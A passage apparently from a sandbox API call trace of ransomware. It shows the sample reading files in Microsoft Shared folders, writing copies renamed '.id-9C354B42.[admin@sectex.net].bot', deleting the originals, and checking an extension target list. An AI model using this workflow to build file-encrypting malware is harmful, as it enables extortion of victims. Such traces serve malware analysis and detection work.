	[0051.961] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0051.962] GetLastError () returned 0x0
	[0051.962] ReadFile (in: hFile=0x21c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x1a9b, lpOverlapped=0x0) returned 1
	[0051.963] WriteFile (in: hFile=0x1c0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x1aa0, lpOverlapped=0x0) returned 1
	[0051.964] ReadFile (in: hFile=0x21c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.964] WriteFile (in: hFile=0x1c0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0051.964] SetEndOfFile (hFile=0x1c0) returned 1
	[0051.965] CloseHandle (hObject=0x1c0) returned 1
	[0051.965] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.965] SetEndOfFile (hFile=0x21c) returned 1
	[0051.966] CloseHandle (hObject=0x21c) returned 1
	[0051.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.966] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 1
	[0051.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.966] lstrlenW (lpString=".doc") returned 4
	[0051.966] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0051.966] lstrlenW (lpString=".docx") returned 5
	[0051.966] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1
	[0051.966] lstrlenW (lpString=".pdf") returned 4
	[0051.966] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0051.966] lstrlenW (lpString=".xls") returned 4
	[0051.966] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0051.966] lstrlenW (lpString=".xlsx") returned 5
	[0051.966] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1
	[0051.966] lstrlenW (lpString=".ppt") returned 4
	[0051.966] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0051.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.967] lstrlenW (lpString=".zip") returned 4
	[0051.967] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString=".rar") returned 4
	[0051.967] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString=".bz2") returned 4
	[0051.967] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0051.967] lstrlenW (lpString=".7z") returned 3
	[0051.967] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0051.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.967] lstrlenW (lpString=".dbf") returned 4
	[0051.967] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.967] lstrlenW (lpString=".1cd") returned 4
	[0051.967] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0051.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.967] lstrlenW (lpString=".jpg") returned 4
	[0051.967] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.967] lstrlenW (lpString=".doc") returned 4
	[0051.967] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString=".docx") returned 5
	[0051.967] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1
	[0051.967] lstrlenW (lpString=".pdf") returned 4
	[0051.967] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString=".xls") returned 4
	[0051.967] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString=".xlsx") returned 5
	[0051.967] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1
	[0051.967] lstrlenW (lpString=".ppt") returned 4
	[0051.967] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0051.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.967] lstrlenW (lpString=".zip") returned 4
	[0051.967] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0051.968] lstrlenW (lpString=".rar") returned 4
	[0051.968] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0051.968] lstrlenW (lpString=".bz2") returned 4
	[0051.968] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0051.968] lstrlenW (lpString=".7z") returned 3
	[0051.968] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0051.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.968] lstrlenW (lpString=".dbf") returned 4
	[0051.968] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0051.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.968] lstrlenW (lpString=".1cd") returned 4
	[0051.968] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0051.968] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67
	[0051.968] lstrlenW (lpString=".jpg") returned 4
	[0051.968] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0051.968] lstrcmpiW (lpString1=".FLT", lpString2=".bot") returned 1
	[0051.968] lstrlenW (lpString="CGMIMP32.FLT") returned 12
	[0051.968] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.924] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=323936) returned 1
	[0053.925] CloseHandle (hObject=0x22c) returned 1
	[0053.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 0x20
	[0053.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.925] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.925] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.925] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.925] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.925] GetLastError () returned 0x0
	[0053.925] ReadFile (in: hFile=0x22c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x4f160, lpOverlapped=0x0) returned 1
	[0053.932] WriteFile (in: hFile=0x170, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x4f170, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x4f170, lpOverlapped=0x0) returned 1
	[0053.937] ReadFile (in: hFile=0x22c, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.937] WriteFile (in: hFile=0x170, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.937] SetEndOfFile (hFile=0x170) returned 1
	[0053.938] CloseHandle (hObject=0x170) returned 1
	[0053.938] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.938] SetEndOfFile (hFile=0x22c) returned 1
	[0053.941] CloseHandle (hObject=0x22c) returned 1
	[0053.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.941] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 1
	[0053.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.941] lstrlenW (lpString=".doc") returned 4
	[0053.941] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.941] lstrlenW (lpString=".docx") returned 5
	[0053.941] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.941] lstrlenW (lpString=".pdf") returned 4
	[0053.941] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.941] lstrlenW (lpString=".xls") returned 4
	[0053.941] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.942] lstrlenW (lpString=".xlsx") returned 5
	[0053.942] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.942] lstrlenW (lpString=".ppt") returned 4
	[0053.942] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.942] lstrlenW (lpString=".zip") returned 4
	[0053.942] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.942] lstrlenW (lpString=".rar") returned 4
	[0053.942] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.942] lstrlenW (lpString=".bz2") returned 4
	[0053.942] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.942] lstrlenW (lpString=".7z") returned 3
	[0053.942] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.942] lstrlenW (lpString=".dbf") returned 4
	[0053.942] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.942] lstrlenW (lpString=".1cd") returned 4
	[0053.942] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.942] lstrlenW (lpString=".jpg") returned 4
	[0053.942] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.942] lstrlenW (lpString=".doc") returned 4
	[0053.942] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.942] lstrlenW (lpString=".docx") returned 5
	[0053.942] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.942] lstrlenW (lpString=".pdf") returned 4
	[0053.942] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.942] lstrlenW (lpString=".xls") returned 4
	[0053.942] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.942] lstrlenW (lpString=".xlsx") returned 5
	[0053.942] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.943] lstrlenW (lpString=".ppt") returned 4
	[0053.943] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.943] lstrlenW (lpString=".zip") returned 4
	[0053.943] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.943] lstrlenW (lpString=".rar") returned 4
	[0053.943] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.943] lstrlenW (lpString=".bz2") returned 4
	[0053.943] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.943] lstrlenW (lpString=".7z") returned 3
	[0053.943] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.943] lstrlenW (lpString=".dbf") returned 4
	[0053.943] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.943] lstrlenW (lpString=".1cd") returned 4
	[0053.943] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67
	[0053.943] lstrlenW (lpString=".jpg") returned 4
	[0053.943] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.943] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0053.943] lstrlenW (lpString="msitss55.dll") returned 12
	[0053.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.011] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=430080) returned 1
	[0055.011] CloseHandle (hObject=0x234) returned 1
	[0055.011] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 0x20
	[0055.011] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.011] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.011] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0055.328] GetLastError () returned 0x0
	[0055.328] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x69000, lpOverlapped=0x0) returned 1
	[0055.459] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x69010, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x69010, lpOverlapped=0x0) returned 1
	[0055.467] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.467] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.467] SetEndOfFile (hFile=0x158) returned 1
	[0055.468] CloseHandle (hObject=0x158) returned 1
	[0055.468] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.468] SetEndOfFile (hFile=0x234) returned 1
	[0055.471] CloseHandle (hObject=0x234) returned 1
	[0055.472] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.472] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 1
	[0055.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.472] lstrlenW (lpString=".doc") returned 4
	[0055.472] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0055.472] lstrlenW (lpString=".docx") returned 5
	[0055.472] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1
	[0055.472] lstrlenW (lpString=".pdf") returned 4
	[0055.472] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0055.472] lstrlenW (lpString=".xls") returned 4
	[0055.472] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0055.472] lstrlenW (lpString=".xlsx") returned 5
	[0055.472] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1
	[0055.472] lstrlenW (lpString=".ppt") returned 4
	[0055.472] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0055.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.472] lstrlenW (lpString=".zip") returned 4
	[0055.472] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0055.472] lstrlenW (lpString=".rar") returned 4
	[0055.472] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0055.472] lstrlenW (lpString=".bz2") returned 4
	[0055.473] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0055.473] lstrlenW (lpString=".7z") returned 3
	[0055.473] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0055.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.473] lstrlenW (lpString=".dbf") returned 4
	[0055.473] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0055.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.473] lstrlenW (lpString=".1cd") returned 4
	[0055.473] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0055.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.473] lstrlenW (lpString=".jpg") returned 4
	[0055.473] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0055.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.473] lstrlenW (lpString=".doc") returned 4
	[0055.473] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0055.473] lstrlenW (lpString=".docx") returned 5
	[0055.473] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1
	[0055.473] lstrlenW (lpString=".pdf") returned 4
	[0055.473] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0055.473] lstrlenW (lpString=".xls") returned 4
	[0055.473] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0055.473] lstrlenW (lpString=".xlsx") returned 5
	[0055.473] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1
	[0055.473] lstrlenW (lpString=".ppt") returned 4
	[0055.473] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0055.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.473] lstrlenW (lpString=".zip") returned 4
	[0055.473] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0055.473] lstrlenW (lpString=".rar") returned 4
	[0055.473] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0055.473] lstrlenW (lpString=".bz2") returned 4
	[0055.473] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0055.474] lstrlenW (lpString=".7z") returned 3
	[0055.474] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0055.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.474] lstrlenW (lpString=".dbf") returned 4
	[0055.474] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0055.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.474] lstrlenW (lpString=".1cd") returned 4
	[0055.474] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0055.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64
	[0055.474] lstrlenW (lpString=".jpg") returned 4
	[0055.474] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0055.474] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0055.474] lstrlenW (lpString="tipresx.dll.mui") returned 15
	[0055.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.498] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=3584) returned 1
	[0055.498] CloseHandle (hObject=0x234) returned 1
	[0055.498] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui")) returned 0x20
	[0055.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0055.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.499] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 72
	[0055.499] lstrlenW (lpString=".doc") returned 4
	[0055.499] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.499] lstrlenW (lpString=".docx") returned 5
	[0055.499] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
